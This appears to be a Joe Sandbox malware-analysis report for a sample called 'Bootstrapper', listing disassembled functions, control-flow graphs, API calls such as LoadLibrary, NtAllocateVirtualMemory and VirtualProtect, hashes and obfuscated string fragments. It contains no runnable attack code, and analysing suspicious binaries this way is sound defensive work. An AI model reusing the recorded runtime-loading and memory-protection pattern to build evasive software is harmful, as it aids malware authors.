                                                                                • Opcode ID: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
                                                                                • Instruction ID: 92ba6d703af3c42d98fde13338597d1fd6d7556b964779ef4565c3e916891fdd
                                                                                • Opcode Fuzzy Hash: 29f9e2d3866784fb39e4acce5980945244bac95dda44c2316337fe1a20b9e87d
                                                                                • Instruction Fuzzy Hash: 1D412AB5D00209EBDB04CF94C985BFEBBB5FF58310F20815AE815AB381D7389A41DBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 116 7be180-7be18a 117 7be190-7be1a7 116->117 118 7be365 116->118 117->118 120 7be1ad-7be1c2 117->120 119 7be367-7be36a 118->119 120->118 121 7be1c8-7be207 call 7bdfd0 call 7bdcf0 NtAllocateVirtualMemory 120->121 126 7be20d-7be21d 121->126 127 7be2c5-7be2c9 121->127 128 7be21f-7be253 call 7bdfd0 call 7bdcf0 126->128 129 7be25e-7be28d call 7bdfd0 call 7bdcf0 126->129 127->118 130 7be2cf-7be2fa call 7bda60 127->130 150 7be25c 128->150 151 7be255-7be257 128->151 129->127 148 7be28f-7be2bc call 7bdfd0 call 7bdcf0 129->148 139 7be308-7be315 130->139 142 7be352-7be363 139->142 143 7be317-7be350 call 7bda60 139->143 142->119 143->139 148->127 157 7be2be-7be2c0 148->157 150->127 151->119 157->119
                                                                                APIs
                                                                                  • Part of subcall function 007BDFD0: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B
                                                                                • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000004,00000000,00000000,6793C34C), ref: 007BE202
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2616484454-0
                                                                                • Opcode ID: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
                                                                                • Instruction ID: 5cbf584cbb06d1761b4be607a357b03210c12e43e8095bd16a0346fe8cc36440
                                                                                • Opcode Fuzzy Hash: c329ee17c0eff391a5dc2086750547225e65861cfc00dc49fadffb7d0c864216
                                                                                • Instruction Fuzzy Hash: A861F774A04209EFDB04DF94C895BFEBBB9FF48714F108559E911AB381E7789A81CB60

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
                                                                                • Instruction ID: a50049ec98730a9ef2e6bb630192d70802613cd8f7cc1253326958e0d7f8d404
                                                                                • Opcode Fuzzy Hash: fa9555f37e9bcad40d15a3753f67ec6437df51a323d621172d23e0a63ee3dbc2
                                                                                • Instruction Fuzzy Hash: 0FD1F9B4A00208EFDB54DFA4C995FEEBBB5BF48300F208558E905AB346D675EE41DB60

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00797620: EnterCriticalSection.KERNEL32(?,?,007858E0,00000000,D8E815C3), ref: 0079762F
                                                                                • VirtualProtect.KERNELBASE(0080B000,00000080,00000004,?), ref: 00799799
                                                                                • VirtualProtect.KERNELBASE(0080B000,00000080,00000002,?), ref: 00799865
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$CriticalEnterSection
                                                                                • String ID: %ls$cached_fp == invalid_function_sentinel()$cached_fp == new_fp$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
                                                                                • API String ID: 2249083135-1239448957
                                                                                • Opcode ID: 2199cb5ecf52c229ab9a71f5cad3d6f061973f7d7c554b1d948b51d186d152ef
                                                                                • Instruction ID: 4c17b2b9967e55197484d47a379ae05d4be7e058fcb98b23d6bd12d0e0638df5
                                                                                • Opcode Fuzzy Hash: 2199cb5ecf52c229ab9a71f5cad3d6f061973f7d7c554b1d948b51d186d152ef
                                                                                • Instruction Fuzzy Hash: AE3160B1E40208FBEF10EFA4EC4AFAD7374AB45704F10445CF619A6182E6B86A54CB66

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 90 7979d0-7979e5 call 784fd0 92 7979ea-797a03 std::_Timevec::_Timevec call 781770 90->92 95 797a1c-797a39 call 781840 92->95 96 797a05-797a17 call 781750 92->96 101 797a44-797a4a 95->101 102 797b20-797b23 96->102 103 797b0a-797b1d call 7817e0 call 781750 101->103 104 797a50-797ae8 call 799c50 101->104 103->102 109 797af3-797af7 104->109 111 797af9-797b03 109->111 112 797b05 109->112 111->109 112->101
                                                                                APIs
                                                                                • std::_Timevec::_Timevec.LIBCPMTD ref: 007979F1
                                                                                Strings
                                                                                • minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp, xrefs: 007979DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: TimevecTimevec::_std::_
                                                                                • String ID: minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
                                                                                • API String ID: 4219598475-534659383
                                                                                • Opcode ID: 0b017324642f79a9b826f8f6f6c333e39c7f359f72743f5b9516168ff1ec8950
                                                                                • Instruction ID: 735a4ca395a502e28d432a77f4c47048eebb9a7af9d4b5f728529b3a863f4709
                                                                                • Opcode Fuzzy Hash: 0b017324642f79a9b826f8f6f6c333e39c7f359f72743f5b9516168ff1ec8950
                                                                                • Instruction Fuzzy Hash: 5A4192B0A08248EFCB04DB98C591BEDBBB1AF54304F2482D8D0156B3C2D7749F06DB84

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 158 7bdfd0-7be11a 159 7be12a-7be130 158->159 160 7be11c-7be120 158->160 163 7be140-7be150 call 7bdc50 159->163 161 7be132-7be138 160->161 162 7be122-7be126 160->162 161->163 164 7be13a-7be13d 162->164 165 7be128 162->165 168 7be172 163->168 169 7be152-7be16e call 7bdfd0 call 7bdcf0 LoadLibraryW 163->169 164->163 165->163 171 7be175-7be178 168->171 169->171
                                                                                APIs
                                                                                • LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
                                                                                • Instruction ID: 0960f9aee720f2baf174564dd26ac3013634cd361716ad3a2abe67fe17e6f065
                                                                                • Opcode Fuzzy Hash: 4145397a475e41d1b508e212315727e0f51c07c471cf77535c3cdeef071d81e1
                                                                                • Instruction Fuzzy Hash: E441F924E2424CD6EB14DFE4D4407EEB772EF68700F20A429D109EB3A4E77A4A55C76A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 175 7be450-7be46c 176 7be57c-7be57f 175->176 177 7be472-7be478 175->177 178 7be47b-7be482 177->178 178->176 179 7be488-7be4b7 call 7bdfd0 call 7bdcf0 LoadLibraryA 178->179 184 7be56e-7be577 179->184 185 7be4bd-7be4d1 179->185 184->178 186 7be4d4-7be4da 185->186 186->184 187 7be4e0-7be4eb 186->187 188 7be4ed-7be522 call 7bdfd0 call 7bdcf0 187->188 189 7be524-7be555 call 7bdfd0 call 7bdcf0 187->189 200 7be557-7be569 188->200 189->200 200->186
                                                                                APIs
                                                                                  • Part of subcall function 007BDFD0: LoadLibraryW.KERNELBASE(00000000,00000000,5FBFF111,00000000), ref: 007BE16B
                                                                                • LoadLibraryA.KERNELBASE(007BD9C7,00000000,00000001,5FBFF0FB,?,?,?,?,007BD9C7), ref: 007BE4AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
                                                                                • Instruction ID: 804cca83c2bbf88fadd2486d9f2cb49190865e6c9dcedfbe5e684da14cdcf116
                                                                                • Opcode Fuzzy Hash: 81b1951c4f8b689c6a5172aab15668dca1c8adb7f196ad730add9b9f0a925985
                                                                                • Instruction Fuzzy Hash: 7341E770D00209EFCB14DFA8C884BEDBBB1FF48304F108169E915AB355D638AA51CF94

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 201 799e40-799e60 VirtualProtect 202 799e68 201->202 203 799e62-799e66 201->203 204 799e6c-799e73 202->204 203->204
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(0080B000,00000080,00000002,?), ref: 00799E58
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: a6fffc76041d610344dfb09df06837e057ef2cb61222e92974c4398a7e865806
                                                                                • Instruction ID: 2849123cb3133ba58337ae356f1b8ddb66dd267a60099bb1979a94d42e7e1450
                                                                                • Opcode Fuzzy Hash: a6fffc76041d610344dfb09df06837e057ef2cb61222e92974c4398a7e865806
                                                                                • Instruction Fuzzy Hash: 85E02B2154C38C76FF10C6A45C0ABAE7F6C9741B01F0441D4EA84E61C1D6BB890EC3A2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ___scrt_get_show_window_mode.LIBCMTD ref: 0077BCA6
                                                                                  • Part of subcall function 0077C7B0: GetStartupInfoW.KERNEL32(?), ref: 0077C7CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID: InfoStartup___scrt_get_show_window_mode
                                                                                • String ID:
                                                                                • API String ID: 2456344720-0
                                                                                • Opcode ID: 8798566cf1ab6ff89ce6204bd82ff4acb9be21b634f7a22c2a423effe79c38d4
                                                                                • Instruction ID: de2e062093e40111a714856214fbc22508f404ce403d17e1efc09e5b0437a4a2
                                                                                • Opcode Fuzzy Hash: 8798566cf1ab6ff89ce6204bd82ff4acb9be21b634f7a22c2a423effe79c38d4
                                                                                • Instruction Fuzzy Hash: 82D05EB4D44208FBDB00FFE49807F6EB7B9AB88702F204199B50897282D9385A0097F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 3q$=gB\$B!$Z$]&zA$rI?I$v$0b|$qO'
                                                                                • API String ID: 0-2389408367
                                                                                • Opcode ID: 434ecc566071a113fc7ccd4c207e06cd76f3f9eea43cdd7d54a1b4d4b9dcf337
                                                                                • Instruction ID: e7ee572e01e1ad521da27032eb082d91c65fe82ec68380d5248c988322ffc268
                                                                                • Opcode Fuzzy Hash: 434ecc566071a113fc7ccd4c207e06cd76f3f9eea43cdd7d54a1b4d4b9dcf337
                                                                                • Instruction Fuzzy Hash: FDB3CB75D002298FCB54CFA9D990AEDBBF1BF58310F14816AE858E7351E738AA81CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -L$I$I$I$I$T$T$T$T$TWVI$TWVI$V$V$V$V$W$W$W$W$`
                                                                                • API String ID: 0-1795987466
                                                                                • Opcode ID: 546def8708830e5c803441ad5b3ed412236819ffa1e1dc47075f999e150972fe
                                                                                • Instruction ID: 8d3b83e890296949f961a61ace3af812d38a870a6643e7e272f71e32829210da
                                                                                • Opcode Fuzzy Hash: 546def8708830e5c803441ad5b3ed412236819ffa1e1dc47075f999e150972fe
                                                                                • Instruction Fuzzy Hash: 1C230371908394CFCB10DF38C84579EBFF1AB56320F0986AED4999B392D7398945CB92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$1'$I$U ,$aUns$cz7hN6$~
                                                                                • API String ID: 0-2497221563
                                                                                • Opcode ID: 3a3879b208d3ce5d0c7afbfcb242f166218ee1a4e1cb893226d5218fcdb75085
                                                                                • Instruction ID: 9c417b8dfdef4dabadc630c75868b97e6e56243df9ef4dfc3028b5bcc5581726
                                                                                • Opcode Fuzzy Hash: 3a3879b208d3ce5d0c7afbfcb242f166218ee1a4e1cb893226d5218fcdb75085
                                                                                • Instruction Fuzzy Hash: 4963ECB1D002699FCB54CFA9D990AECBBF1FB58310F14816AE858EB351E7389A41CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $Ybz$3$9Xw5$=K$>3hq$q
                                                                                • API String ID: 0-913196644
                                                                                • Opcode ID: 037c5d6e173e0ecd79cb4df63c71e6c90630e2e9d9c7d1695f176afae44a2aec
                                                                                • Instruction ID: 2c4ecc90825877a9146a2ab597d743c1faa54b8794fe3cbbb8884c5dae15b629
                                                                                • Opcode Fuzzy Hash: 037c5d6e173e0ecd79cb4df63c71e6c90630e2e9d9c7d1695f176afae44a2aec
                                                                                • Instruction Fuzzy Hash: 5D728A71E00219CFCB18CFA9E8916EDBBF1FB58310B14826AD859E7354EB385945CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <8$[_jM$d$$(5$}r"
                                                                                • API String ID: 0-1869771855
                                                                                • Opcode ID: 156a7cffc2feea6dd1b86a6c57cc424029839bcb838a5144d879873404a74078
                                                                                • Instruction ID: d2775d630fe5b2582f50589a5c59e49b1a1954a74d476a3cb0dcff5012100793
                                                                                • Opcode Fuzzy Hash: 156a7cffc2feea6dd1b86a6c57cc424029839bcb838a5144d879873404a74078
                                                                                • Instruction Fuzzy Hash: 7BB3BC75D002298FCB54CFA9E991AEDBBF1BF58310F14816AE858E7350E7389A81CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$*$a$ay55$d$fJ$zL;i
                                                                                • API String ID: 0-2827015963
                                                                                • Opcode ID: 3a635ac3806847217396fbfb9b74460444bccb6d3ca9d683f3504bb2ecbc7326
                                                                                • Instruction ID: 6fc6b15ea7c9f9099369c4f7fe9090b270e6f615b40ecc396b8a32cb85b6d6b5
                                                                                • Opcode Fuzzy Hash: 3a635ac3806847217396fbfb9b74460444bccb6d3ca9d683f3504bb2ecbc7326
                                                                                • Instruction Fuzzy Hash: 64F22275D002599FCB54CFA9D891AECBBF0FB58310F14812AE898EB391E7389945CF54
                                                                                Strings
                                                                                • ("Division by zero", false), xrefs: 007A2504
                                                                                • %ls, xrefs: 007A2509
                                                                                • minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h, xrefs: 007A2515
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
                                                                                • API String ID: 0-226933
                                                                                • Opcode ID: 7a30850e04aae55803051b10247fde17c48833b5ebdb763e1017c743cd4ce746
                                                                                • Instruction ID: 02c889d9194f74f7c7fe0709913cb612b793d5bfb18ee9d8f5708b2822e5930e
                                                                                • Opcode Fuzzy Hash: 7a30850e04aae55803051b10247fde17c48833b5ebdb763e1017c743cd4ce746
                                                                                • Instruction Fuzzy Hash: EC629974A049289FDB64CF18CD94BAAB7B2BF89316F1082D9D84DA7345DB346E81CF40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: >$n,"E$~z8$U
                                                                                • API String ID: 0-600631289
                                                                                • Opcode ID: 5a4248619b9aa9bfddad46f8397a3425c0a4beb78fc6b0247ff64486c3835fc4
                                                                                • Instruction ID: 5504e394315594c843ffa1c885ec8fa926c15ba84608c36b82be110136623767
                                                                                • Opcode Fuzzy Hash: 5a4248619b9aa9bfddad46f8397a3425c0a4beb78fc6b0247ff64486c3835fc4
                                                                                • Instruction Fuzzy Hash: 4C63F075D002298FCB54CFA9E990AECBBF1FB58311F14826AE858E7351E738A941CF54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
